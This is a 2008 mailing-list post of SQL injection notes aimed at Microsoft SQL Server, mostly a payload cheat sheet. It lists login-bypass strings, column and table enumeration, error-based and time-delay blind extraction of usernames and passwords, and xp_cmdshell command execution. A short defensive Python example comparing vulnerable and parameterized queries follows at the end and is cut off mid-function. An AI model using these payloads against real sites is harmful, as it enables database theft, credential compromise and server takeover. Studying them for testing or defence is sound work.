SQL Injection Notes


Joe

Jan 8, 2008, 5:28:58 AM
to EVIL SQL INJECTION - www.evilsql.com
Here are my SQL Injection Notes. My goal is to marry my notes, and the
new notes I've made from the evilsql.com site. I think the combination
of the 2 sets of notes is going to help to make something that is
pretty good and usable. My concern right now is that neither one of us
really has anything for dealing with quoted sql injection, nor do
either one of us really cover the differences between SQL2K and
SQL2K5.

Hope this helps....




########################
# What you should look for #
########################
Try to look for pages that allow you to submit data (e.g. login page,
search page, feedback, etc.).

Sometimes, HTML pages will use the POST command to send parameters to
another ASP page. Therefore, you may not see the parameters in the
URL.

However, you can check the source code of the HTML and look for the
"FORM" tag. You may find something like this in some HTML code:

<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>

Everything between the <FORM> and </FORM> tags has potential parameters
that might be useful (exploit-wise).



############################################
# What if you can't find any page that takes input? #
############################################
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to
look especially for URLs that take parameters, like:

http://site.com/index.asp?id=10


################################
# How do you test if it is vulnerable? #
################################
Start with a single quote trick. Input something like:

hi' or 1=1--

Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--

or

- http://site.com/index.asp?id=hi' or 1=1--


If you must do this with a hidden field, just download the source HTML
from the site, save it to your hard disk, and modify the URL and hidden
field accordingly. Example:

<FORM action=http://site.com/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>

If luck is on your side, you will get logged in without any login name
or password.

You can also do this with a local proxy like Paros or WebScarab.


##########################
# What are some things to try #
##########################
View source code and look for any parameters being passed to the
website.

- Save the page locally
  * Substitute any variable being passed to the website with your SQLi
  * Example variables:
    - username/passwords
    - check boxes
    - radio buttons
    - cookie data
    - session data
    - referrer

- Use a local proxy to substitute the vars with your injection
  * Example variables:
    - username/passwords
    - check boxes
    - radio buttons
    - cookie data
    - session data
    - referrer



Some example injections you can use are:
'
"
;
#
##
%00
--
admin:' or a=a--
admin:' or 1=1--
admin'--
*'") OR ("'* --
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a


##############################
# Determine if it is direct or quoted #
##############################
The first error that you are normally confronted with is the syntax
error. A syntax error indicates that the query does not conform to the
proper structure of an SQL query. The first thing that you need to
figure out is whether injection is possible without escaping quotation.

Direct
In a direct injection, whatever argument you submit will be used in
the SQL query without any modification. Try taking the parameter's
legitimate value and appending a space and the word "OR" to it. If
that generates an error, direct injection is possible.

Quoted
All other instances are quoted injection vulnerabilities. In a quoted
injection, whatever argument you submit has a quote prepended and
appended to it by the application.

In order to break out of the quotes and manipulate the query while
maintaining valid syntax, your injection string must contain a single
quote before you use an SQL keyword, and end in a WHERE statement that
needs a quote appended to it.



##############################
# Number of columns enumeration #
##############################
Using 'Order by' to determine the number of columns in a given query
string for use with blind sql injection:

http://www.example.com/index.php?newsid=394 order by 100/*
When we pass 100, it should say "unknown column in order by clause".
We use the process of elimination to determine the number of columns.
Next we would halve the number.


http://www.example.com/index.php?newsid=394 order by 50/*
Again we would get an error. Let's try something like... 10


http://www.example.com/index.php?newsid=394 order by 10/*
When we do the number 10, the query completes just fine. We are close,
but there might be more.


http://www.example.com/index.php?newsid=394 order by 15/*
Another error in the order by clause. We know there is more than 10,
but less than 15.


http://www.example.com/index.php?newsid=394 order by 12/*
This passed just fine. Might be more, let's test.


http://www.example.com/index.php?newsid=394 order by 13/*
Error. This means we have 12 columns. Now we are ready for some blind
SQL injection. The reason for doing this is because the union select
query must have the same number of columns when selecting from a
query. Now we run the following on the site and start testing for some
table names:


http://www.example.com/index.php?newsid=null UNION ALL SELECT
1,2,3,4,5,6,7,8,9,10,11,12 FROM tablename/*



##########################################
# MS SQL Table, and column name enumeration #
##########################################
Note: All of the table enumeration injections listed below may or may
not require the ('). Be sure to try both. I seem to have more luck
without the (').

Example:
http://www.site.com/article.asp?id=1' having 1=1--
or
http://www.site.com/article.asp?id=1 having 1=1--


' having 1=1--
This query needs the GROUP BY operator, and should return an error
that includes a column name.



' group by table_name.column_name1 having 1=1--
This should also return an error that includes another column name. So
you just repeat the process.



' group by table_name.column_name1, table_name.column_name2 having
1=1--
This should also return an error that includes another column name. So
you just repeat the process.


' group by table_name.column_name1, table_name.column_name3,
table_name.column_name2 having 1=1--
You just keep doing this until you no longer receive errors that
include the column name.



#########################
# Column Type Enumeration #
#########################
' union select sum(column_name1) from table_name --
Look at error message to determine if data is int, or varchar.


' union select sum(column_name2) from table_name --
Look at error message to determine if data is int, or varchar.


' union select sum(column_name3) from table_name --
Look at error message to determine if data is int, or varchar.



############################
# MS SQL Stored Procedures #
############################

'; exec sp_makewebtask "c:\Inetpub\wwwroot\evil.htm", select * from
table_name";--
This should dump the contents of table_name providing you have write
access in order to create the webpage.

' or 1=1; exec master..xp_cmdshell '"ipconfig" > c:\Inetpub\wwwroot
\ip.txt';--
Then browse to the text file.


#############################
# Inference Based SQL Injection #
#############################
Note: The waitfor+delay operator seems to work best for me when used
like this:

http://www.site.com/article.asp?id=;waitfor+delay+'0:0:5';--


;waitfor+delay+'0:0:5';--
See if it takes 5 seconds to return the page. If it does, then you can
ask it questions.


;if+not(substring((select+@@version),%,1)+<>+5)+waitfor+delay
+'0:0:5';--
Ask it if it is running SQL Server 2000


;if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:5'--
Ask it if it's running as 'sa'


;if+is_srvrolemember('sysadmin')+>+0+waitfor+delay+'0:0:5';--
Ask it if the current user is a member of the sysadmin group


===================================================================
Summary of notes from evilsql.com

####################################
# MS-SQL INJECTION Basic DETECTION #
####################################

Integer Injection:
http://[site]/page.asp?id=1 having 1=1--

Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.

String Injection:
http://[site]/page.asp?id=x' having 1=1--

Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.


ERROR SQL INJECTION - EXTRACT DATABASE USER

http://[site]/page.asp?id=1 or 1=convert(int,(USER))--

Syntax error converting the nvarchar value '[DB USER]' to a column of
data type int.


ERROR SQL INJECTION - EXTRACT DATABASE NAME

http://[site]/page.asp?id=1 or 1=convert(int,(DB_NAME))--

Syntax error converting the nvarchar value '[DB NAME]' to a column of
data type int.


ERROR SQL INJECTION - EXTRACT DATABASE VERSION

http://[site]/page.asp?id=1 or 1=convert(int,(@@VERSION))--

Syntax error converting the nvarchar value '[DB VERSION]' to a column
of data type int.


ERROR SQL INJECTION - EXTRACT SERVER NAME

http://[site]/page.asp?id=1 or 1=convert(int,(@@SERVERNAME))--

Syntax error converting the nvarchar value '[SERVER NAME]' to a column
of data type int.


ERROR SQL INJECTION - EXTRACT 1st DATABASE TABLE

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from
sysobjects where xtype=char(85)))--

Syntax error converting the nvarchar value '[TABLE NAME 1]' to a
column of data type int.


ERROR SQL INJECTION - EXTRACT 2nd DATABASE TABLE

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from
sysobjects where xtype=char(85) and name>'TABLE-NAME-1'))--

Syntax error converting the nvarchar value '[TABLE NAME 2]' to a
column of data type int.


ERROR SQL INJECTION - EXTRACT 3rd DATABASE TABLE

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from
sysobjects where xtype=char(85) and name>'TABLE-NAME-2'))--

Syntax error converting the nvarchar value '[TABLE NAME 3]' to a
column of data type int.


ERROR SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1
column_name from DBNAME.information_schema.columns where
table_name='TABLE-NAME-1'))--

Syntax error converting the nvarchar value '[COLUMN NAME 1]' to a
column of data type int.


ERROR SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1
column_name from DBNAME.information_schema.columns where
table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-1'))--

Syntax error converting the nvarchar value '[COLUMN NAME 2]' to a
column of data type int.


ERROR SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1
column_name from DBNAME.information_schema.columns where
table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-2'))--

Syntax error converting the nvarchar value '[COLUMN NAME 3]' to a
column of data type int.


ERROR SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1
COLUMN-NAME-1 from TABLE-NAME-1))--

Syntax error converting the nvarchar value '[FIELD 1 VALUE]' to a
column of data type int.


ERROR SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1
COLUMN-NAME-2 from TABLE-NAME-1))--

Syntax error converting the nvarchar value '[FIELD 2 VALUE]' to a
column of data type int.


ERROR SQL INJECTION - EXTRACT 3rd FIELD OF 1st ROW

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1
COLUMN-NAME-3 from TABLE-NAME-1))--

Syntax error converting the nvarchar value '[FIELD 3 VALUE]' to a
column of data type int.


ERROR SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1
COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in
('FIELD-1-VALUE') order by COLUMN-NAME-1 desc))--

Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 2ND
ROW]' to a column of data type int.


ERROR SQL INJECTION - EXTRACT 1st FIELD OF 3rd ROW

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1
COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in
('FIELD-2-VALUE') order by COLUMN-NAME-1 desc))--

Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 3RD
ROW]' to a column of data type int.

##########################
# MS-SQL UNION Injection #
##########################
UNION SQL INJECTION - DETECTION

Integer Injection:
http://[site]/page.asp?id=1 UNION SELECT ALL 1--

All queries in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--

All queries in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--

All queries in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--

NO ERROR


UNION SQL INJECTION - EXTRACT DATABASE USER

http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4--

[DB USER]


UNION SQL INJECTION - EXTRACT DATABASE NAME

http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME,3,4--

[DB NAME]


UNION SQL INJECTION - EXTRACT DATABASE VERSION

http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4--

[DB VERSION]


UNION SQL INJECTION - EXTRACT SERVER NAME

http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@SERVERNAME,3,4--

[SERVER NAME]


UNION SQL INJECTION - EXTRACT DATABASE TABLES

http://[site]/page.asp?id=1 UNION SELECT ALL 1,name,3,4 from
sysobjects where xtype=char(85)--

[TABLE NAME 1]


UNION SQL INJECTION - EXTRACT TABLE COLUMN NAMES

http://[site]/page.asp?id=1 UNION SELECT ALL 1,column_name,3,4 from
DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--

[COLUMN NAME 1]


UNION SQL INJECTION - EXTRACT 1st FIELD

http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from
TABLE-NAME-1--

[FIELD 1 VALUE]


UNION SQL INJECTION - EXTRACT 2nd FIELD

http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from
TABLE-NAME-1--

[FIELD 2 VALUE]


UNION SQL INJECTION - EXTRACT 3rd FIELD

http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from
TABLE-NAME-1--

[FIELD 3 VALUE]

##########################
# MS-SQL Blind Injection #
##########################
BLIND SQL INJECTION - DETECTION

Integer Injection:
http://[site]/page.asp?id=1; WAITFOR DELAY '00:00:10'-- (+10 seconds)

String Injection:
http://[site]/page.asp?id=x'; WAITFOR DELAY '00:00:10'-- (+10 seconds)


BLIND SQL INJECTION - EXTRACT DATABASE USER

3 - Total Characters
http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY
'00:00:10'--
http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY
'00:00:10'--
http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY
'00:00:10'-- (+10 seconds)

D - 1st Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
1,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
1,1)))=98) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
1,1)))=99) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)

B - 2nd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
2,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)

O - 3rd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))>115) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))=109) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Database User = DBO


BLIND SQL INJECTION - EXTRACT DATABASE NAME

http://[site]/page.asp?id=1; IF (LEN(DB_NAME())=8) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
1,1)))=112) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
2,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
3,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
4,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
5,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
6,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
7,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
8,1)))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Database Name = PRO-DB-1


BLIND SQL INJECTION - EXTRACT 1st DATABASE TABLE

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects
where xtype='U')=5) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85)),1,1)))=117) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85)),2,1)))=115) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85)),3,1)))=101) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85)),4,1)))=114) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85)),5,1)))=115) WAITFOR DELAY
'00:00:10'-- (+10 seconds)

Table Name = USERS


BLIND SQL INJECTION - EXTRACT 2nd DATABASE TABLE

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects
where xtype=char(85) and name>'USERS')=6) WAITFOR DELAY '00:00:10'--
(+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
1,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
2,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
3,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
4,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
5,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
6,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Table Name = ORDERS


BLIND SQL INJECTION - EXTRACT 3rd DATABASE TABLE

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects
where xtype=char(85) and name>'ORDERS')=9) WAITFOR DELAY '00:00:10'--
(+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
1,1)))=99) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
2,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
3,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
4,1)))=116) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
5,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
6,1)))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
7,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
8,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
9,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Table Name = CUSTOMERS


BLIND SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from
PRO-DB-1.information_schema.columns where table_name='USERS')=4) WAITFOR
DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS'),1,1)))=117) WAITFOR DELAY '00:00:10'-- (+10
seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS'),2,1)))=115) WAITFOR DELAY '00:00:10'-- (+10
seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS'),3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10
seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS'),4,1)))=114) WAITFOR DELAY '00:00:10'-- (+10
seconds)

Column Name = USER


BLIND SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from
PRO-DB-1.information_schema.columns where table_name='USERS' and
column_name>'USER')=4) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'USER'),1,1)))=112) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'USER'),2,1)))=97) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'USER'),3,1)))=115) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'USER'),4,1)))=115) WAITFOR DELAY
'00:00:10'-- (+10 seconds)

Column Name = PASS


BLIND SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from
PRO-DB-1.information_schema.columns where table_name='USERS' and
column_name>'PASS')=2) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'PASS'),1,1)))=105) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'PASS'),2,1)))=100) WAITFOR DELAY
'00:00:10'-- (+10 seconds)

Column Name = ID


BLIND SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS)=5)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER
from USERS),1,1))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER
from USERS),2,1))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER
from USERS),3,1))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER
from USERS),4,1))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER
from USERS),5,1))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Field Data = ADMIN


BLIND SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 PASS from USERS)=3)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS
from USERS),1,1))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS
from USERS),2,1))=50) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS
from USERS),3,1))=51) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Field Data = 123


BLIND SQL INJECTION - EXTRACT 3rd FIELD OF 1st ROW

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 ID from USERS)=3)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID
from USERS),1,1))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID
from USERS),2,1))=48) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID
from USERS),3,1))=48) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Field Data = 100


BLIND SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS
where USER NOT in ('ADMIN') order by USER desc)=3) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('ADMIN') order by USER desc),
1,1)))=106) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('ADMIN') order by USER desc),
2,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('ADMIN') order by USER desc),
3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Field Data = JOE


BLIND SQL INJECTION - EXTRACT 1st FIELD OF 3rd ROW

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS
where USER NOT in ('JOE') order by USER desc)=3) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('JOE') order by USER desc),
1,1)))=106) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('JOE') order by USER desc),
2,1)))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('JOE') order by USER desc),
3,1)))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Field Data = JIM
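As an added example (mine, not code from Joe's post or from evilsql.com), the "direct" versus "quoted" distinction the notes describe, shown from the defender's side: two deliberately vulnerable query builders over a constructed SQLite table, beside parameterized versions that treat the same inputs as plain data. SQLite stands in for SQL Server here; the table, column names and sample rows are assumptions of this example.

```python
import sqlite3

# Constructed sample data (not from the original post): a tiny users table.
SAMPLE_USERS = [(1, "admin", "123"), (2, "joe", "pw-joe"), (3, "jim", "pw-jim")]


def make_db():
    """Create an in-memory SQLite database with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, passwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_quoted_login(conn, username, password):
    # Quoted injection: the application itself wraps the input in single
    # quotes, so a leading ' in the input closes the string early and the
    # trailing -- comments out the rest of the statement.
    sql = ("SELECT id, username FROM users WHERE username = '" + username
           + "' AND passwd = '" + password + "'")
    return conn.execute(sql).fetchall()


def vulnerable_direct_lookup(conn, user_id):
    # Direct injection: the value is pasted into the statement with no
    # quoting at all, so no quote character is needed to break out.
    sql = "SELECT id, username FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def safe_login(conn, username, password):
    # Parameterized: the driver sends values separately from the SQL text,
    # so quotes and comment markers in the input stay literal data.
    sql = "SELECT id, username FROM users WHERE username = ? AND passwd = ?"
    return conn.execute(sql, (username, password)).fetchall()


def safe_lookup(conn, user_id):
    # For an integer parameter, validate the type first and then bind it;
    # anything that is not a plain number is rejected before reaching SQL.
    if not user_id.isdigit():
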